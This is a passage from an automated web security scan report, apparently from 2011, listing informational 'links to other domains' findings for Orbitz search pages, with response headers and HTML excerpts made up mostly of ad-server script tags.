...[SNIP]...
<li class="last">Compare <a href="http://www.trip.com">cheap trips</a>
...[SNIP]...
<li class="first">Read Away.com's <a href="http://www.away.com">travel guide</a>
...[SNIP]...
<li>Research <a href="http://www.gorp.com">national parks</a>
...[SNIP]...
<li>Get <a href="http://www.lodging.com">lodging</a>
...[SNIP]...
<li class="last">Find <a href="http://outsideonline.com">outdoor gear</a>
...[SNIP]...
<li class="first">Book <a href="http://www.ebookers.com">cheap hotels</a>
...[SNIP]...
<li class="last"><a href="http://www.orbitzforbusiness.com/homepage_footer">Corporate travel</a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...
<div class="ad" id="ad1">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=1&width=1&adType=noframe&pos=1&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=1&width=1&adType=noframe&pos=1&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=1&width=1&adType=noframe&pos=1&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad2">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=1&width=1&adType=noframe&pos=2&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=1&width=1&adType=noframe&pos=2&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=1&width=1&adType=noframe&pos=2&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad3">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=1&width=1&adType=noframe&pos=3&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=1&width=1&adType=noframe&pos=3&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=1&width=1&adType=noframe&pos=3&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad4">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=1&width=1&adType=noframe&pos=4&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=1&width=1&adType=noframe&pos=4&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=1&width=1&adType=noframe&pos=4&" height="1" width="1" border="0"></a>
...[SNIP]...

17.335. http://www.orbitz.com/App/DPTLandingPageSearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/DPTLandingPageSearch

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/App/DPTLandingPageSearch?z=4fbc&r=22

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://twitter.com/orbitz
http://www.facebook.com/Orbitz
http://www.google.com/jsapi
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/html.ng/channel=air&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=CF01ADA3860370757BCE14E28DEA4DEF; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:11:53 GMT
Content-Length: 156615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad" id="ad519x225">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=225&width=519&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=225&width=519&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=225&width=519&adType=noframe&" height="225" width="519" border="0"></a>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=air&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&"></script>
...[SNIP]...
<div class="ad" id="ad519x150">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=150&width=519&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=150&width=519&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=150&width=519&adType=noframe&" height="150" width="519" border="0"></a>
...[SNIP]...
<div class="adColumn">
       <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&" height="280" width="336" border="0"></a>
...[SNIP]...
<div class="adColumn lastColumn">
       <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&" height="280" width="336" border="0"></a>
...[SNIP]...
<div class="ad" id="ad728x90">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...
<div class="ad" id="ad1">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=1&width=1&adType=noframe&pos=1&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=1&width=1&adType=noframe&pos=1&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=1&width=1&adType=noframe&pos=1&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad2">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=1&width=1&adType=noframe&pos=2&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=1&width=1&adType=noframe&pos=2&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=1&width=1&adType=noframe&pos=2&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad3">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=1&width=1&adType=noframe&pos=3&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=1&width=1&adType=noframe&pos=3&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=1&width=1&adType=noframe&pos=3&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad4">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=1&width=1&adType=noframe&pos=4&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=1&width=1&adType=noframe&pos=4&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=1&width=1&adType=noframe&pos=4&" height="1" width="1" border="0"></a>
...[SNIP]...

17.336. http://www.orbitz.com/App/DisplayCarSearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/DisplayCarSearch

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/App/DisplayCarSearch?z=2eba&r=d

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://twitter.com/orbitz
http://www.facebook.com/Orbitz
http://www.google.com/jsapi
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=519x120&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=120&rotator=module&width=519&adType=script&
